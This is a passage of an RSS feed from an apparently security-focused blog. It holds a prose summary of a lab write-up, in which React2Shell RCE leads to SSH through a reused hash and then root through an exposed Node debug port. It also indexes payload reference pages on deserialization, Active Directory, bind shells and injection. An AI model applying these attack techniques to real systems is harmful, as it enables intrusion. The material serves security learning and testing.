<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>bokkapig</title><link>https://bokkapig.pages.dev/</link><description>Recent content on bokkapig</description><generator>Hugo</generator><language>en-gb</language><lastBuildDate>Tue, 04 Aug 2026 14:45:21 +0100</lastBuildDate><atom:link href="https://bokkapig.pages.dev/index.xml" rel="self" type="application/rss+xml"/><item><title>Reactor</title><link>https://bokkapig.pages.dev/writeups/reactor/</link><pubDate>Tue, 04 Aug 2026 14:45:21 +0100</pubDate><guid>https://bokkapig.pages.dev/writeups/reactor/</guid><description>A ReactorWatch monitoring dashboard on port 3000 runs Next.js 15.0.3 with React 19.0.0 — vulnerable to React2Shell (CVE-2025-55182 / CVE-2025-66478), an unauthenticated RCE in the React Server Components Flight deserializer. A POST to / carrying a Next-Action header and a forged circular Flight chunk reaches Function via $1:constructor:constructor, giving code execution as the node service account. The app&amp;rsquo;s world-readable SQLite database yields engineer&amp;rsquo;s MD5 password hash, reused verbatim for SSH. Root comes from a root-owned uptime-monitor systemd unit launched with &amp;ndash;inspect=127.0.0.1:9229: the Node debug port is an unauthenticated root eval primitive, driven over the Chrome DevTools Protocol.</description></item><item><title>.NET Deserialization</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/dotnet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-deserialization/dotnet/</guid><description>&lt;blockquote&gt;
&lt;p&gt;.NET serialization is the process of converting an object’s state into a format that can be easily stored or transmitted, such as XML, JSON, or binary. This serialized data can then be saved to a file, sent over a network, or stored in a database. Later, it can be deserialized to reconstruct the original object with its data intact. Serialization is widely used in .NET for tasks like caching, data transfer between applications, and session state management.&lt;/p&gt;</description></item><item><title>Active Directory Attacks</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/active-directory-attack/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/active-directory-attack/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://github.com/swisskyrepo/InternalAllTheThings/"&gt;InternalAllTheThings/active-directory&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/"&gt;Active Directory - Certificate Services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/"&gt;Active Directory - Access Controls ACL/ACE&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-enumerate/"&gt;Active Directory - Enumeration&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-group-policy-objects/"&gt;Active Directory - Group Policy Objects&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-groups/"&gt;Active Directory - Groups&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-linux/"&gt;Active Directory - Linux&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-ntds-dumping/"&gt;Active Directory - NTDS Dumping&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-rodc/"&gt;Active Directory - Read Only Domain Controller&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/"&gt;Active Directory - Federation Services&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-integrated-dns/"&gt;Active Directory - Integrated DNS - ADIDNS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-asrep/"&gt;Roasting - ASREP Roasting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-kerberoasting/"&gt;Roasting - Kerberoasting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-timeroasting/"&gt;Roasting - Timeroasting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-tricks/"&gt;Active Directory - Tricks&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-sccm/"&gt;Deployment - SCCM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-wsus/"&gt;Deployment - WSUS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-capture/"&gt;Hash - Capture and Cracking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-over-pass-the-hash/"&gt;Hash - OverPass-the-Hash&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-pass-the-hash/"&gt;Hash - Pass-the-Hash&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-dcom/"&gt;Internal - DCOM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-mitm-relay/"&gt;Internal - MITM and Relay&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-pxe-boot-image/"&gt;Internal - PXE Boot Image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-shares/"&gt;Internal - Shares&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-bronze-bit/"&gt;Kerberos - Bronze Bit&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-constrained/"&gt;Kerberos Delegation - Constrained Delegation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-rbcd/"&gt;Kerberos Delegation - Resource Based Constrained Delegation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-unconstrained/"&gt;Kerberos Delegation - Unconstrained Delegation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-s4u/"&gt;Kerberos - Service for User Extension&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/"&gt;Kerberos - Tickets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-comments/"&gt;Password - AD User Comment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-dsrm-credentials/"&gt;Password - DSRM Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-group-policy-preferences/"&gt;Password - Group Policy Preferences&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-precreated-computer/"&gt;Password - Pre-Created Computer Account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-gmsa/"&gt;Password - GMSA&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-laps/"&gt;Password - LAPS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-shadow-credentials/"&gt;Password - Shadow Credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-spraying/"&gt;Password - Spraying&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-pam/"&gt;Trust - Privileged Access Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-relationship/"&gt;Trust - Relationship&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-sid-hijacking/"&gt;Child Domain to Forest Compromise - SID Hijacking&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-ticket/"&gt;Forest to Forest Compromise - Trust Ticket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/MS14-068/"&gt;CVE&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/MS14-068/"&gt;MS14-068 Checksum Validation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/NoPAC/"&gt;NoPAC / samAccountName Spoofing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrintNightmare/"&gt;PrintNightmare&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrivExchange/"&gt;PrivExchange&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/ZeroLogon/"&gt;ZeroLogon&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Application Escape and Breakout</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/escape-breakout/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/escape-breakout/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/"&gt;InternalAllTheThings/cheatsheets/escape-breakout&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#gaining-a-command-shell"&gt;Gaining a command shell&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#sticky-keys"&gt;Sticky Keys&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#dialog-boxes"&gt;Dialog Boxes&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#creating-new-files"&gt;Creating new files&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#open-a-new-windows-explorer-instance"&gt;Open a new Windows Explorer instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#exploring-context-menus"&gt;Exploring Context Menus&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#save-as"&gt;Save as&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#input-boxes"&gt;Input Boxes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#bypass-file-restrictions"&gt;Bypass file restrictions&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#internet-explorer"&gt;Internet Explorer&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#shell-uri-handlers"&gt;Shell URI Handlers&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Bazaar</title><link>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/bazaar/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/insecure-source-code-management/bazaar/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Bazaar (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#tools"&gt;Tools&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#rip-bzrpl"&gt;rip-bzr.pl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#bzr_dumper"&gt;bzr_dumper&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="tools" class="anchored-heading"&gt;Tools&lt;a class="heading-anchor" href="#tools" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="rip-bzrpl" class="anchored-heading"&gt;rip-bzr.pl&lt;a class="heading-anchor" href="#rip-bzrpl" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl"&gt;kost/dvcs-ripper/rip-bzr.pl&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Bind Shell</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/bind-shell-cheatsheet/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/bind-shell-cheatsheet/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/"&gt;InternalAllTheThings/cheatsheets/shell-bind&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#perl"&gt;Perl&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#python"&gt;Python&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#php"&gt;PHP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ruby"&gt;Ruby&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-traditional"&gt;Netcat Traditional&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#netcat-openbsd"&gt;Netcat OpenBsd&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#ncat"&gt;Ncat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#socat"&gt;Socat&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#powershell"&gt;Powershell&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Books</title><link>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/books/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/learning-and-socials/books/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Grab a book and relax. Some of the best books in the industry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Wiley&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.goodreads.com/book/show/32027337-advanced-penetration-testing"&gt;Advanced Penetration Testing: Hacking the World&amp;rsquo;s Most Secure Networks by Wil Allsopp (2017)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html"&gt;Android Hacker&amp;rsquo;s Handbook by Joshua J. Drake et al. (2014)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html"&gt;iOS Hacker&amp;rsquo;s Handbook by Charlie Miller et al. (2012)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html"&gt;The Browser Hacker&amp;rsquo;s Handbook by Wade Alcorn et al. (2014)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html"&gt;The Database Hacker&amp;rsquo;s Handbook, David Litchfield et al. (2005)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html"&gt;The Mac Hacker&amp;rsquo;s Handbook by Charlie Miller &amp;amp; Dino Dai Zovi (2009)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html"&gt;The Mobile Application Hacker&amp;rsquo;s Handbook by Dominic Chell et al. (2015)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html"&gt;The Shellcoders Handbook by Chris Anley et al. (2007)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html"&gt;The Web Application Hackers Handbook by D. Stuttard, M. Pinto (2011)&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Leanpub&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Bug Hunting Methodology and Enumeration</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/methodology-and-enumeration/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/methodology-and-enumeration/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/"&gt;InternalAllTheThings/methodology/bug-hunting-methodology&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#passive-recon"&gt;Passive Recon&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Shodan&lt;/li&gt;
&lt;li&gt;Wayback Machine&lt;/li&gt;
&lt;li&gt;The Harvester&lt;/li&gt;
&lt;li&gt;Github OSINT&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#active-recon"&gt;Active Recon&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#network-discovery"&gt;Network discovery&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#web-discovery"&gt;Web discovery&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/#looking-for-web-vulnerabilities"&gt;Web Vulnerabilities&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Cassandra Injection</title><link>https://bokkapig.pages.dev/refs/payloads/sql-injection/cassandra-injection/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/sql-injection/cassandra-injection/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#cql-injection-limitations"&gt;CQL Injection Limitations&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cassandra-comment"&gt;Cassandra Comment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#cassandra-login-bypass"&gt;Cassandra Login Bypass&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#example-1"&gt;Example #1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#example-2"&gt;Example #2&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="cql-injection-limitations" class="anchored-heading"&gt;CQL Injection Limitations&lt;a class="heading-anchor" href="#cql-injection-limitations" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Cassandra is a non-relational database, so CQL doesn&amp;rsquo;t support &lt;code&gt;JOIN&lt;/code&gt; or &lt;code&gt;UNION&lt;/code&gt; statements, which makes cross-table queries more challenging.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Additionally, Cassandra lacks convenient built-in functions like &lt;code&gt;DATABASE()&lt;/code&gt; or &lt;code&gt;USER()&lt;/code&gt; for retrieving database metadata.&lt;/p&gt;</description></item><item><title>Cloud - AWS</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cloud-aws-pentest/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cloud-aws-pentest/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://github.com/swisskyrepo/InternalAllTheThings/"&gt;InternalAllTheThings/cloud/aws&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/"&gt;Cloud - AWS&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-access-token/"&gt;AWS - Access Token &amp;amp; Secrets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-cognito/"&gt;AWS - Service - Cognito&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-dynamodb/"&gt;AWS - Service - DynamoDB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ec2/"&gt;AWS - Service - EC2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-enumeration/"&gt;AWS - Enumerate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-iam/"&gt;AWS - Identity &amp;amp; Access Management&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ioc-detection/"&gt;AWS - IOC &amp;amp; Detections&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-lambda/"&gt;AWS - Service - Lambda&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-metadata/"&gt;AWS - Metadata SSRF&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-s3-bucket/"&gt;AWS - Service - S3 Buckets&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-ssm/"&gt;AWS - Service - SSM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/aws-training/"&gt;AWS - Training&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Cloud - Azure</title><link>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cloud-azure-pentest/</link><pubDate>Mon, 03 Aug 2026 23:13:12 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/payloads/methodology-and-resources/cloud-azure-pentest/</guid><description>&lt;p&gt;:warning: Content of this page has been moved to &lt;a href="https://github.com/swisskyrepo/InternalAllTheThings/"&gt;InternalAllTheThings/cloud/azure&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-connect/"&gt;Azure AD Connect&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-enumeration/"&gt;Azure AD Enumerate&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-devices-users-sp/"&gt;Azure AD IAM&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-phishing/"&gt;Azure AD Phishing&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-access-and-token/"&gt;Azure AD Tokens&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-persistence/"&gt;Azure Persistence&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-requirements/"&gt;Azure Requirements&lt;/a&gt;&lt;/li&gt;
